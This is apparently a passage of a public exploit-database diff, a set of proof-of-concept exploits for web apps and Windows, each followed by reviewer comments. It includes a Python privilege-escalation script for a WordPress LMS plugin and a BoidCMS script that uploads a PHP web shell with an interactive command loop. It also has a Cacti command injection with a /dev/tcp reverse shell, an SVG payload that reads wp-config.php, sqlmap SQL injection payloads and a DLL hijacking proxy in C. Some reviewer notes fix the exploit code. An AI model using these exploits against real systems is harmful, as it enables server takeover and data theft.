"user_login":"{}".format(username),
"user_email":"{}".format(email),
"user_password":"{}".format(password),
"user_password_re":"{}".format(password),
"become_instructor":True,
"privacy_policy":True,
"degree":"",
"expertize":"",
"auditory":"",
"additional":[],
"additional_instructors":[],
"profile_default_fields_for_register":[],
"redirect_page":"{}/user-account/".format(target)
}
start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
if start.status_code == 200:
print("[+] Exploit Success !!")
else:
print("[+] Exploit Failed :p")
# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)
if int(int_version) < 3018:
print("[+] Target is Vulnerable !!")
# Credential
email = input("[+] Email: ")
username = input("[+] Username: ")
password = input("[+] Password: ")
time.sleep(1)
print("[+] Getting Nonce...")
get_nonce = get_nonce(target)
# Get Nonce
if get_nonce != None:
print("[+] Success Getting Nonce: {}".format(get_nonce))
time.sleep(1)
# Start PrivEsc
privesc(target, get_nonce, username, password, email)
# ----------------------------------
else:
print("[+] Target is NOT Vulnerable :p")


@ -0,0 +1,44 @@
## Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution
## Author: nu11secur1ty
## Date: 09/04/2023
## Vendor: https://webigniter.net/
## Software: https://webigniter.net/demo
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The media function suffers from file upload vulnerability.
The attacker can upload and he can execute remotely very dangerous PHP
files, by using any created account before this on this system.
Then he can do very malicious stuff with the server of this application.
## Staus: HIGH-CRITICAL Vulnerability
[+]Simple Exploit:
```PHP
<?php
phpinfo();
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html)
## Time spent:
00:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
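Review bot: the description says the upload needs `any created account before this on this system`, so this is an authenticated file upload and the title should say so. The write-up does not name the media upload endpoint, the parameter, or which check is missing, which is what a maintainer needs to fix it. `Staus` should be `Status`. Everything from `--` onward (`System Administrator - Infrastructure Engineer` through `nu11secur1ty <http://nu11secur1ty.com/>`) is an e-mail signature, including two URLs run together (`index.htmlhttps://cxsecurity.com/`) and an opaque base64 token, and does not belong in the exploit file.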


@ -0,0 +1,48 @@
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php
#LFI
Steps to trigger conversion of a remote SVG
Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)
Host 2 files :
- malicious.svg
- malicious.svg[1]
Payload:
For LFI, getting wp-config.php:
Both malicious.svg and malicious.svg[1] on the remote FTP:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.
Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/
# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).
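Review bot: the SVG in the LFI payload is malformed as listed: the `>` at the end of the `xmlns:xlink` line closes the `<svg` start tag, which leaves the following `xmlns="http://www.w3.org/2000/svg">` line as stray text, so the listing does not match what the linked repository ships; correct the listing or point readers to the repository copy. The closing note on policy.xml should also say which entries matter: the payload depends on the `text:` coder (the `text:../../../../wp-config.php` href) and on ImageMagick fetching a remote `ftp://` resource, so an ImageMagick policy that disables the TEXT coder and remote URL/FTP fetching is the mitigation administrators should check for.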


@ -0,0 +1,70 @@
Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25
Bugs: RCE
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date of found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps
1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.
$ cat >> test.php
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php
1. Login to account
2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
3. Upload zip file
4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php
poc request
POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip
PK
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>™b%Wz½µ}(<28><><EFBFBD>(<28><><EFBFBD><08><1C>test.phpUT <09>ñòödÓòödux <0B><04><><EFBFBD><EFBFBD><04><><EFBFBD><EFBFBD><?php echo system('cat /etc/passwd');?>
PK
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>™b%Wz½µ}(<28><><EFBFBD>(<28><><EFBFBD><08><18><><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD>¤<C2A4><C281><EFBFBD><EFBFBD>test.phpUT<05>ñòödux <0B><04><><EFBFBD><EFBFBD><04><><EFBFBD><EFBFBD>PK<06><><EFBFBD><EFBFBD><01><01>N<EFBFBD><4E><EFBFBD>j<EFBFBD><6A><EFBFBD><EFBFBD><EFBFBD>
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"
50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"
1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--
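Review bot: the step list is numbered 1, 1, 2, 3, 4 and the write-up starts at section "2." with no section 1; more importantly, the zip bytes in the PoC request (the `PK` lines) are rendered as mojibake, so the request cannot be replayed from the listing. The `cat`/`zip` commands above it already suffice to rebuild the archive, or attach it base64-encoded. "Login to account" should say which role is needed, since pluginmgr.php is the administrative plugin manager and the required privilege decides the severity. Minor: "sequeze" should be "compress", and "Date of found" should be "Date found".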


@ -0,0 +1,40 @@
# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
----------------------------------------------------------------------------------------------------
1-First install sonar music plugin.
2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3-Press the Add new playlist button
4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/
6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>
Bingoo
Request:
POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486
Connection: close
comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5
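Review bot: the request is sent by the logged-in user `hunter` (the `wordpress_logged_in_...` cookie) and includes the `_wp_unfiltered_html_comment` nonce field, which WordPress emits only for accounts holding the `unfiltered_html` capability; for such accounts core accepts a `<script>` comment by design, so as shown this may not be a plugin bug at all. The PoC should be repeated from an anonymous or Subscriber-level commenter to show that the plugin's playlist page renders unsanitized comment content. Also, "Vendor Homepage" points at a localhost path rather than the plugin's vendor page.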


@ -0,0 +1,65 @@
# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
# Date: 2023-07-03
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/info/downloads
# Version: Cacti 1.2.24
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
# CVE: CVE-2023-39362
# Category: WebApps
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Vulnerability discovered and reported by: Antonio Francesco Sardella
=======================================================================================
Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)
=======================================================================================
-----------------
Executive Summary
-----------------
In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.
-------
Exploit
-------
Prerequisites:
- The attacker is authenticated.
- The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".
- A Device that supports SNMP can be used.
- Net-SNMP Graphs can be used.
- snmp module of PHP is not installed.
Example of an exploit:
- Go to "Console" > "Create" > "New Device".
- Create a Device that supports SNMP version 1 or 2.
- Ensure that the Device has Graphs with one or more templates of:
- "Net-SNMP - Combined SCSI Disk Bytes"
- "Net-SNMP - Combined SCSI Disk I/O"
- (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)
- In the "SNMP Options", for the "SNMP Community String" field, use a value like this:
public\' ; touch /tmp/m3ssap0 ; \'
- Click the "Create" button.
- Check under /tmp the presence of the created file.
To obtain a reverse shell, a payload like the following can be used.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).
----------
Root Cause
----------
A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).
----------
References
----------
- https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
- https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html
- https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
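Review bot: the advisory gives no fixed version or remediation. Add a "Fix" section naming the release that addresses CVE-2023-39362, and, given the prerequisite that the PHP snmp module is not installed, say whether installing that extension removes the injectable path (the prerequisites imply it does), since that is the quickest check an administrator can make while waiting to upgrade. The Prerequisites and Exploit sections are otherwise complete and reproducible.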

64
exploits/php/webapps/51741.py Executable file

@ -0,0 +1,64 @@
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd
def showhelp():
print(parser.print_help())
exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()
with requests.Session() as s:
req=s.get(f'{base_url}/admin')
token=re.findall('[a-z0-9]{64}',req.text)
form_login_data={
"username":user,
"password":passwd,
"login":"Login",
}
form_login_data['token']=token
s.post(f'{base_url}/admin',data=form_login_data)
#=========== File upload to RCE
req=s.get(f'{base_url}/admin?page=media')
token=re.findall('[a-z0-9]{64}',req.text)
form_upld_data={
"token":token,
"upload":"Upload"
}
#==== php shell
php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
with open('shell.php','w') as f:
f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("Upload failed")
exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
cmd=input("cmd >> ")
if cmd=='exit': exit()
req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
print(req.text)
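Review bot: `if req.status_code == '404':` compares an int against a string, so it can never be true and "Upload failed" is never reported; compare against the integer `404` (or test `req.ok`). `re.findall` returns a list, so `token` is posted as a list and `requests` sends it as repeated `token` fields; take the first match with `[0]` and abort when nothing matches. `print(parser.print_help())` prints `None` after the help text; call `parser.print_help()` on its own. The `open('shell.php','rb')` handle is never closed.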


@ -0,0 +1,39 @@
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8
Bugs: Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
write https://youserver/test.xml to we_cmd[0] parameter
poc request
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close
we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
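Review bot: the PoC request carries a `WESESSION` cookie, so state whether the `widgetGetRss` call requires an authenticated session; an authenticated blind SSRF is a different finding from an unauthenticated one. The write-up should also say how the outbound request was observed (a server under the tester's control receiving the fetch of test.xml), since a blind SSRF is only demonstrated by that callback. Minor: "Date of found" should be "Date found", and the text starts at section "2." with no section 1.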


@ -0,0 +1,48 @@
## Title: Limo Booking Software v1.0 - CORS
## Author: nu11secur1ty
## Date: 09/08/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
## Reference: https://portswigger.net/web-security/cors
## Description:
The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin http://wioydcbiourl.com
Since the Vary: Origin header was not present in the response, reverse
proxies and intermediate servers may cache it. This may enable an
attacker to carry out cache poisoning attacks. The attacker can get
some of the software resources of the victim without the victim
knowing this.
STATUS: HIGH Vulnerability
[+]Test Payload:
```
GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://wioydcbiourl.com
Referer: http://demo.phpjabbers.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html)
## Time spent:
00:35:00
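Review bot: the "Test Payload" shows only the request; the claims that the origin `http://wioydcbiourl.com` was allowed and that `Vary: Origin` was absent can only be demonstrated from the response headers, which should be included. The rating also depends on whether the response carries `Access-Control-Allow-Credentials: true`; without it a reflected `Access-Control-Allow-Origin` exposes no authenticated data, so say which case this is. The request line is broken across two lines (`HTTP/1.1` on its own line), so the block does not paste back into a client as-is.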


@ -0,0 +1,75 @@
## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/10/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The location_id parameter appears to be vulnerable to SQL injection
attacks. A single quote was submitted in the location_id parameter,
and a database error message was returned. Two single quotes were then
submitted and the error message disappeared.
The attacker easily can steal all information from the database of
this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: location_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND 1347=1347 AND ('MVss'='MVss&traveling=from
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (GTID_SUBSET)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT
(ELT(9416=9416,1))),0x71706b7071),9416) AND
('dOqc'='dOqc&traveling=from
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND
('EEYQ'='EEYQ&traveling=from
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)
## Time spent:
01:47:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
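Review bot: the e-mail signature block is pasted twice at the end of the file (from the first `--` line onward) and belongs in neither copy. The fence is tagged `mysql` but contains sqlmap output rather than SQL; tag it as plain text. The payloads list only query parameters; name the script they are sent to (the companion Limo Booking advisory shows `index.php`), otherwise readers can neither reproduce the request nor write a detection rule for it.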


@ -0,0 +1,230 @@
#---------------------------------------------------------
# Title: Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
# Date: 2023-09-01
# Author: Moein Shahabi
# Vendor: https://www.microsoft.com
# Version: Windows 11 Pro 10.0.22621
# Tested on: Windows 11_x64 [eng]
#---------------------------------------------------------
Description:
HelpPane object allows us to force Windows 11 to DLL hijacking
Instructions:
1. Compile dll
2. Copy newly compiled dll "apds.dll" in the "C:\Windows\" directory
3. Launch cmd and Execute the following command to test HelpPane object "[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID('8CEC58AE-07A1-11D9-B15E-000D56BFE6EE'))"
4. Boom DLL Hijacked!
------Code_Poc-------
#pragma once
#include <Windows.h>
// Function executed when the thread starts
extern "C" __declspec(dllexport)
DWORD WINAPI MessageBoxThread(LPVOID lpParam) {
    MessageBox(NULL, L"DLL Hijacked!", L"DLL Hijacked!", NULL);
    return 0;
}
PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE) {
#ifdef _WIN64
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;
    // Create some breathing room
    baseAddress = baseAddress + optionalHeader->SizeOfImage;
    for (PBYTE offset = baseAddress; offset < baseAddress + MAXDWORD; offset += 1024 * 8) {
        PBYTE usuable = (PBYTE)VirtualAlloc(
            offset,
            size,
            MEM_RESERVE | MEM_COMMIT,
            protection);
        if (usuable) {
            ZeroMemory(usuable, size); // Not sure if this is required
            return usuable;
        }
    }
#else
    // x86 doesn't matter where we allocate
    PBYTE usuable = (PBYTE)VirtualAlloc(
        NULL,
        size,
        MEM_RESERVE | MEM_COMMIT,
        protection);
    if (usuable) {
        ZeroMemory(usuable, size);
        return usuable;
    }
#endif
    return 0;
}
BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase)
{
#ifdef _WIN64
    BYTE jmpPrefix[] = { 0x48, 0xb8 }; // Mov Rax <Addr>
    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Rax
#else
    BYTE jmpPrefix[] = { 0xb8 }; // Mov Eax <Addr>
    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Eax
#endif
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;
    PIMAGE_DATA_DIRECTORY exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (exportDataDirectory->Size == 0)
        return FALSE; // Nothing to forward
    PIMAGE_EXPORT_DIRECTORY targetExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress);
    if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames)
        return FALSE; // TODO: Add support for DLLs with mixed ordinals
    dosHeader = (PIMAGE_DOS_HEADER)ourBase;
    ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    optionalHeader = &ntHeaders->OptionalHeader;
    exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (exportDataDirectory->Size == 0)
        return FALSE; // Our DLL is broken
    PIMAGE_EXPORT_DIRECTORY ourExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress);
    // ----------------------------------
    // Make current header data RW for redirections
    DWORD oldProtect = 0;
    if (!VirtualProtect(
        ourExportDirectory,
        64, PAGE_READWRITE,
        &oldProtect)) {
        return FALSE;
    }
    DWORD totalAllocationSize = 0;
    // Add the size of jumps
    totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpSuffix) + sizeof(LPVOID));
    // Add the size of function table
    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT);
    // Add total size of names
    PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames);
    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++)
        totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1;
    // Add size of name table
    totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT);
    // Add the size of ordinals:
    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
    // Allocate usuable memory for rebuilt export data
    PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE);
    if (!exportData)
        return FALSE;
    PBYTE sideAllocation = exportData; // Used for VirtualProtect later
    // Copy Function Table
    PINT newFunctionTable = (PINT)exportData;
    CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfFunctions * sizeof(INT));
    exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT);
    ourExportDirectory->AddressOfFunctions = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase);
    // Write JMPs and update RVAs in the new function table
    PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions);
    for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) {
        newFunctionTable[i] = (DWORD)(exportData - (PBYTE)ourBase);
        CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix));
        exportData += sizeof(jmpPrefix);
        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]);
        CopyMemory(exportData, &realAddress, sizeof(LPVOID));
        exportData += sizeof(LPVOID);
        CopyMemory(exportData, jmpSuffix, sizeof(jmpSuffix));
        exportData += sizeof(jmpSuffix);
    }
    // Copy Name RVA Table
    PINT newNameTable = (PINT)exportData;
    CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfNames * sizeof(DWORD));
